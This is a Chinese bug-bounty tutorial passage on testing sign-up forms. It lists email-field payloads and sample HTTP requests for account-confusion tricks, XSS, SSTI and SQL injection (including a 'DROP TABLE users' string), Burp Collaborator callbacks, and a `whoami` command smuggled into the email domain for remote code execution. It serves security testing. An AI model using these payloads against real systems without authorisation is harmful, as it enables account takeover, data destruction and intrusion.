正文
本文承接前文赏金猎人系列-如何测试注册(Sign up)功能,继续梳理注册功能的测试流程,相关文章还有:
第八种情况
注册的时候尝试利用带有空格的公司邮箱地址来注册,比方说: "admin@company.com "(注意:com后面有一个空格)
可能会发现一些意向不到的情况(可能会发现有额外的权限)
POST /signUp HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number firstname=I&lastname=am&email=admin@company.com &password=*****&captcha=Random&token=CSRF
第九种情况
注册公司邮件的时候尝试用大写的邮件,例如admin@COMPANY.COM,可能获取额外的权限或获得更多的功能
POST /signUp HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number firstname=I&lastname=am&email=admin@COMPANY.COM &password=*****&captcha=Random&token=CSRF
第十种情况
邮件写成以下形式,你可能会有意想不到的发现:
admin@gmail.com@company.com me+(@gmail.com)@company.com "me@gmail.com"@company.com "<me@gmail.com>"@company.com "me@gmail.com;"@company.com "me@gmail.com+"@company.com
第十一种情况
和上面tips类似,将gmail用googlemail.com 来替代
admin@googlemail.com@company.com me+(@googlemail.com)@company.com "me@googlemail.com"@company.com "<me@googlemail.com.com>"@company.com "me@googlemail.com;"@company.com "me@googlemail.com+"@company.com
第十二种情况
尝试使用以下payload,看是否能造成xss,ssti或者sqli
me+(<script>alert(0)</script>)@gmail.com me(<script>alert(0)</script>)@gmail.com me@gmail(<script>alert(0)</script>).com "<script>alert(0)</script>"@gmail.com "<%= 7 * 7 %>"@gmail.com me+(${{7*7}})@gmail.com "' OR 1=1 -- '"@gmail.com "me); DROP TABLE users;--"@gmail.com %@gmail.com
第十三种情况
尝试用以下payload获取后台信息或者内部IPs
me@id.collaborator.net me@[id.collaborator.net] user(;me@id.collaborator.net)@gmail.com me@id.collaborator.net(@gmail.com) me+(@gmail.com)@id.collaborator.net <me@id.collaborator.net>user@gmail.com
第十四种情况
有时候系统在发送之前会ping你的主机,可以尝试利用带有注入系统命令的Burp Collaborator的邮件地址来实现rce
如下所示
POST /signUp HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Origin: https://www.company.com Content-Length: Number firstname=I&lastname=am&email=me@`whoami`.id.collaborat or.net&password=********&captcha=Random&token=CSRF
参考
http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate
https://www.youtube.com/watch?v=cThFNXrBYQU
https://www.youtube.com/watch?v=cbJ4NSYsUto
https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses
